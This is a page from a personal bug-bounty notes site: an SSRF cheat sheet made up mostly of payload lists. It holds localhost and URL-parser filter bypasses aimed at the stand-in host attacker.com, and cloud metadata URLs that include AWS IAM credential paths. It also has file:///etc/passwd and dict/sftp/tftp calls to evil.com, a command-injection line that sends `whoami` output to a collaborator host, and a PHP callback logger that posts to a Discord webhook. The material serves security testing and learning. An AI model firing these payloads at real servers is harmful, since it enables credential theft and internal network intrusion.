Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
    • DNS Dangling / NS Takeover
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
    • Amazon Cognito Misconfiguraitons
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
  • IOS-AppSec
Powered by GitBook
On this page
  • Local Host
  • Domain
  • Protocols
  • Other Test Cases
  • Make you own SSRF tool
  • Resources

Was this helpful?

Edit on GitHub
  1. Web-AppSec

SSRF

CWE-918: Server-Side Request Forgery (SSRF)

Local Host

All IPv4: 0
All IPv6: ::
All IPv4: 0.0.0.0
Localhost IPv6: ::1
All IPv4: 0000
All IPv4: (Leading zeros): 00000000
IPv4 mapped IPv6 address: 0:0:0:0:0:FFFF:7F00:0001
8-Bit Octal conversion: 0177.00.00.01
32-Bit Octal conversion: 017700000001
32-Bit Hex conversion: 0x7f000001

# Localhost
<http://127.0.0.1:80>
<http://127.0.0.1:443>
<http://127.0.0.1:22>
<http://127.1:80>
<http://127.000000000000000.1>
<http://0>
http:@0/ --> <http://localhost/>
<http://0.0.0.0:80>
<http://localhost:80>
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
<http://①②⑦.⓪.⓪.⓪>

# CDIR bypass
<http://127.127.127.127>
<http://127.0.1.3>
<http://127.0.0.0>

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
<http://2130706433/> = <http://127.0.0.1>
<http://3232235521/> = <http://192.168.0.1>
<http://3232235777/> = <http://192.168.1.1>

# Octal Bypass
<http://0177.0000.0000.0001>
<http://00000177.00000000.00000000.00000001>
<http://017700000001>

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
<http://0x7f000001/> = <http://127.0.0.1>
<http://0xc0a80014/> = <http://192.168.0.20>
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# <https://www.silisoftware.com/tools/ipconverter.php>

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
<http://0/>
<http://127.1>
<http://127.0.1>

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
<http://customer1.app.localhost.my.company.127.0.0.1.nip.io>
<http://bugbounty.dod.network> = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1

various bypasses

127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost
localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3.3.3.3/
127.1.1.1:80\\@127.2.2.2:80/
127.1.1.1:80\\@@127.2.2.2:80/
127.1.1.1:80:\\@@127.2.2.2:80/
127.1.1.1:80#\\@127.2.2.2:80/

Domain

https:attacker.com
https:/attacker.com
http:/\\/\\attacker.com
https:/\\attacker.com
//attacker.com
\\/\\/attacker.com/
/\\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
<http://169.254.1698.254\\@attacker.com>
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
<https://{domain}@attacker.com>
https://{domain}.attacker.com
<https://{domain}%6D@attacker.com>
<https://attacker.com/{domain}>
<https://attacker.com/?d={domain}>
<https://attacker.com#{domain}>
<https://attacker.com>@{domain}
<https://attacker.com#@{domain}>
<https://attacker.com>%23@{domain}
<https://attacker.com>%00{domain}
<https://attacker.com>%0A{domain}
<https://attacker.com?{domain}>
<https://attacker.com///{domain}>
<https://attacker.com>\\{domain}/
<https://attacker.com>;https://{domain}
<https://attacker.com>\\{domain}/
<https://attacker.com>\\.{domain}
<https://attacker.com/.{domain>}
<https://attacker.com>\\@@{domain}
<https://attacker.com>:\\@@{domain}
<https://attacker.com#\\@{domain}>
<https://attacker.com>\\anything@{domain}/
<https://www.victim.com>(\\u2044)some(\\u2044)path(\\u2044)(\\u0294)some=param(\\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
<http://1.1.1.1> &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com

# Bypass via open redirect
<https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection>

Cloud Meta Data files

## AWS
# from <http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories>

<http://169.254.169.254/latest/user-data>
<http://169.254.169.254/latest/user-data/iam/security-credentials/>[ROLE NAME]
<http://169.254.169.254/latest/meta-data/iam/security-credentials/>[ROLE NAME]
<http://169.254.169.254/latest/meta-data/ami-id>
<http://169.254.169.254/latest/meta-data/reservation-id>
<http://169.254.169.254/latest/meta-data/hostname>
<http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key>
<http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key>

# AWS - Dirs 

<http://169.254.169.254/>
<http://169.254.169.254/latest/meta-data/>
<http://169.254.169.254/latest/meta-data/public-keys/>

## Google Cloud
#  <https://cloud.google.com/compute/docs/metadata>
#  - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"

<http://169.254.169.254/computeMetadata/v1/>
<http://metadata.google.internal/computeMetadata/v1/>
<http://metadata/computeMetadata/v1/>
<http://metadata.google.internal/computeMetadata/v1/instance/hostname>
<http://metadata.google.internal/computeMetadata/v1/instance/id>
<http://metadata.google.internal/computeMetadata/v1/project/project-id>

# Google allows recursive pulls 
<http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true>

## Google
#  Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)

<http://metadata.google.internal/computeMetadata/v1beta1/>

## Digital Ocean
# <https://developers.digitalocean.com/documentation/metadata/>

<http://169.254.169.254/metadata/v1.json>
<http://169.254.169.254/metadata/v1/> 
<http://169.254.169.254/metadata/v1/id>
<http://169.254.169.254/metadata/v1/user-data>
<http://169.254.169.254/metadata/v1/hostname>
<http://169.254.169.254/metadata/v1/region>
<http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address>

## Packetcloud

<https://metadata.packet.net/userdata>

## Azure
#  Limited, maybe more exist?
# <https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/>
<http://169.254.169.254/metadata/v1/maintenance>

## Update Apr 2017, Azure has more support; requires the header "Metadata: true"
# <https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service>
<http://169.254.169.254/metadata/instance?api-version=2017-04-02>
<http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text>

## OpenStack/RackSpace 
# (header required? unknown)
<http://169.254.169.254/openstack>

## HP Helion 
# (header required? unknown)
<http://169.254.169.254/2009-04-04/meta-data/> 

## Oracle Cloud
<http://192.0.0.192/latest/>
<http://192.0.0.192/latest/user-data/>
<http://192.0.0.192/latest/meta-data/>
<http://192.0.0.192/latest/attributes/>

## Alibaba
<http://100.100.100.200/latest/meta-data/>
<http://100.100.100.200/latest/meta-data/instance-id>
<http://100.100.100.200/latest/meta-data/image-id>

## Enclosed Alphanumeric
<http://⑯⑨>。②⑤④。⑯⑨。②⑤④/
<http://⓪ⓧⓐ⑨>。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
Successfully bypassed a SSRF WAF by using a combination of IPV6 + Unicode. Payload for Metadata instances:
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
Check images for response difference between 169.254.169.254 and the above payload I shared

Protocols

file:///etc/passwd
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
ssrf.php?url=sftp://evil.com:11111/
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
# Gopher://
Fortunately, you can use Gopherus[<https://github.com/tarunkant/Gopherus>] to create payloads for several services. Additionally, remote-method-guesser[<https://github.com/qtc-de/remote-method-guesser>] can be used to create gopher payloads for Java RMI services

Other Test Cases

# SSRF via Referrer header
<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#ssrf-via-referrer-header>
# SSRF via SNI data from certificate  --> <https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#ssrf-via-sni-data-from-certificate>
openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf
# Wget File Upload 
<https://book.hacktricks.xyz/pentesting-web/file-upload#wget-file-upload-ssrf-trick>
# SSRF with Command Injection
url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
# PDFs Rendering
If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF and you will be able to abuse a SSRF. Find more information here. <https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf>
# From SSRF to DoS
Create several sessions and try to download heavy files exploiting the SSRF from the sessions.
# SSRf PHP Functions

Host this PHP code after editing discord webhook in your server to get notified whenever there is SSRF 

<?php
date_default_timezone_set('Asia/Kolkata'); //Change this if you need to

$date = date('Y-m-d H:i:s');


$ip_address = $_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$endpoint = $_SERVER['REQUEST_URI'];

$log_message = "**Seems like you have a HIT**\n```Date: $date\t\nIP: $ip_address\t\nUser-Agent: $user_agent\t\nPath: $endpoint```\n";

// echo $log_message;
echo "<body><h1>Hit Me Harder :) </h1></body>";


$webhook_url = "https://discord.com/api/webhooks/10589949/E9uS3k9MxnI5CiIfmtmXHfornTObgZ_xl"; // replace with your webhook URL
$message = array("content" => "$log_message"); // the message you want to send

$ch = curl_init($webhook_url);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($message));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

?>

Resources

Youtube

  • https://www.youtube.com/watch?v=U0bPPw6uPgY&t=1s

  • https://www.youtube.com/watch?v=324cZic6asE

  • https://www.youtube.com/watch?v=o-tL9ULF0KI

  • https://www.youtube.com/watch?v=324cZic6asE&t=751s

  • https://youtu.be/m4BxIf9PUx0

  • https://youtu.be/apzJiaQ6a3k

Hackerone Reports

  • https://hackerone.com/hacktivity?order_field=popular&filter=type%3Apublic&querystring=SSRF

  • https://hackerone.com/reports/737161

  • https://hackerone.com/reports/816848

  • https://hackerone.com/reports/398799

  • https://hackerone.com/reports/382048

  • https://hackerone.com/reports/406387

  • https://hackerone.com/reports/736867

  • https://hackerone.com/reports/517461

  • https://hackerone.com/reports/508459

  • https://hackerone.com/reports/738553

  • https://hackerone.com/reports/514224

  • https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF

  • https://hackerone.com/reports/341876

  • https://hackerone.com/reports/793704

  • https://hackerone.com/reports/386292

  • https://hackerone.com/reports/326040

  • https://hackerone.com/reports/310036

  • https://hackerone.com/reports/643622

  • https://hackerone.com/reports/885975

  • https://hackerone.com/reports/207477

  • https://hackerone.com/reports/514224

Blogs

  • https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978

  • https://medium.com/@kapilvermarbl/ssrf-server-side-request-forgery-5131ffd61c3c

  • https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326

  • https://medium.com/@chawdamrunal/what-is-server-side-request-forgery-ssrf-7cd0ead0d95f

  • https://medium.com/swlh/ssrf-in-the-wild-e2c598900434

  • https://medium.com/@briskinfosec/ssrf-server-side-request-forgery-ae44ec737cb8

  • https://medium.com/@GAYA3_R/vulnerability-server-side-request-forgery-ssrf-9fe5428184c1

  • https://medium.com/@gupta.bless/exploiting-ssrf-for-admin-access-31c30457cc44

  • https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151

  • https://medium.com/@dlpadmavathi.us/ssrf-attack-real-example-a7279256abee

  • https://blog.securityinnovation.com/the-many-faces-of-ssrf

  • https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/

  • http://www.techpna.com/uptzh/blind-ssrf-medium.html

  • https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90

  • http://institutopaideia.com.br/journal/blind-ssrf-medium-cfa769

  • https://www.reddit.com/r/bugbounty/comments/cux2zs/ssrf_in_the_wild_the_startup_medium/

  • https://www.sonrn.com.br/blog/5a44cc-blind-ssrf-medium

  • https://ssrf-bypass-medium.thickkare.pw/

  • https://hackerone.com/reports/326040

  • https://www.zerocopter.com/vulnerabilities-price-list-printable

  • https://medium.com/swlh/intro-to-ssrf-beb35857771f

  • https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a

  • https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739

  • https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-testing-b9dfe57cca35

  • https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0

  • https://medium.com/bugbountywriteup/tagged/ssrf

  • https://medium.com/seconset/all-about-ssrf-524f41ab96df

  • https://blog.cobalt.io/from-ssrf-to-port-scanner-3e8ef5921fbf

  • https://portswigger.net/web-security/ssrf

  • https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

Github Repos

  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

  • https://github.com/jdonsec/AllThingsSSRF

PreviousSQL To RCENextSSTI

Last updated 9 months ago

Was this helpful?

by

🕸️
Make you own SSRF tool
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
https://highon.coffee/blog/ssrf-cheat-sheet/
URL Format Bypass - HackTricks
SSRF vulnerabilities and where to find them - Detectify Labs
A New Era of SSRF
Orange Tsai